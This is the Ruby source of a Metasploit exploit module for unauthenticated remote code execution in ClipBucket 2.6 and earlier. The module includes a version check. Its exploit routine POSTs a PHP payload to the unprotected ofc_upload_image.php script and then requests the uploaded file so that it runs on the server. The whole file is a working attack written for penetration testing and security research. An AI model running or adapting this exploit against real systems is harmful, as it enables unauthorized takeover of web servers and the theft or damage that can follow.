1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::FileDropper
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => "ClipBucket Remote Code Execution",
17
        'Description' => %q{
18
          This module exploits a vulnerability found in ClipBucket version 2.6 and lower.
19
          The script "/admin_area/charts/ofc-library/ofc_upload_image.php" can be used to
20
          upload arbitrary code without any authentication. This module has been tested
21
          on version 2.6 on CentOS 5.9 32-bit.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [
25
          'Gabby', # Vulnerability Discovery, PoC
26
          'xistence <xistence[at]0x90.nl>' # Metasploit module
27
        ],
28
        'References' => [
29
          [ 'PACKETSTORM', '123480' ]
30
        ],
31
        'Platform' => ['php'],
32
        'Arch' => ARCH_PHP,
33
        'Targets' => [
34
          ['Clipbucket 2.6', {}]
35
        ],
36
        'Privileged' => false,
37
        'DisclosureDate' => '2013-10-04',
38
        'DefaultTarget' => 0,
39
        'Notes' => {
40
          'Reliability' => UNKNOWN_RELIABILITY,
41
          'Stability' => UNKNOWN_STABILITY,
42
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
43
        }
44
      )
45
    )
46

47
    register_options(
48
      [
49
        OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
50
      ]
51
    )
52
  end
53

54
  def uri
55
    return target_uri.path
56
  end
57

58
  def check
59
    # Check version
60
    peer = "#{rhost}:#{rport}"
61

62
    vprint_status("Trying to detect installed version")
63

64
    res = send_request_cgi({
65
      'method' => 'GET',
66
      'uri' => normalize_uri(uri, "")
67
    })
68

69
    if res and res.code == 200 and res.body =~ /ClipBucket version (\d+\.\d+)/
70
      version = $1
71
    else
72
      return Exploit::CheckCode::Unknown
73
    end
74

75
    vprint_status("Version #{version} detected")
76

77
    if version > "2.6"
78
      return Exploit::CheckCode::Safe
79
    else
80
      return Exploit::CheckCode::Appears
81
    end
82

83
    return Exploit::CheckCode::Safe
84
  end
85

86
  def exploit
87
    peer = "#{rhost}:#{rport}"
88
    payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php"
89

90
    print_status("Uploading payload [ #{payload_name} ]")
91
    res = send_request_cgi({
92
      'method' => 'POST',
93
      'uri' => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"),
94
      'headers' => { 'Content-Type' => 'text/plain' },
95
      'vars_get' => { 'name' => payload_name },
96
      'data' => payload.encoded
97
    })
98

99
    # If the server returns 200 we assume we uploaded the malicious
100
    # file successfully
101
    if not res or res.code != 200 or res.body !~ /Saving your image to: \.\.\/tmp-upload-images\/(#{payload_name})/ or res.body =~ /HTTP_RAW_POST_DATA/
102
      fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
103
    end
104

105
    register_files_for_cleanup(payload_name)
106

107
    print_status("Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]")
108
    res = send_request_cgi({
109
      'method' => 'GET',
110
      'uri' => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name)
111
    })
112

113
    # If we don't get a 200 when we request our malicious payload, we suspect
114
    # we don't have a shell, either.
115
    if res and res.code != 200
116
      print_error("Unexpected response, probably the exploit failed")
117
    end
118
  end
119
end
120

121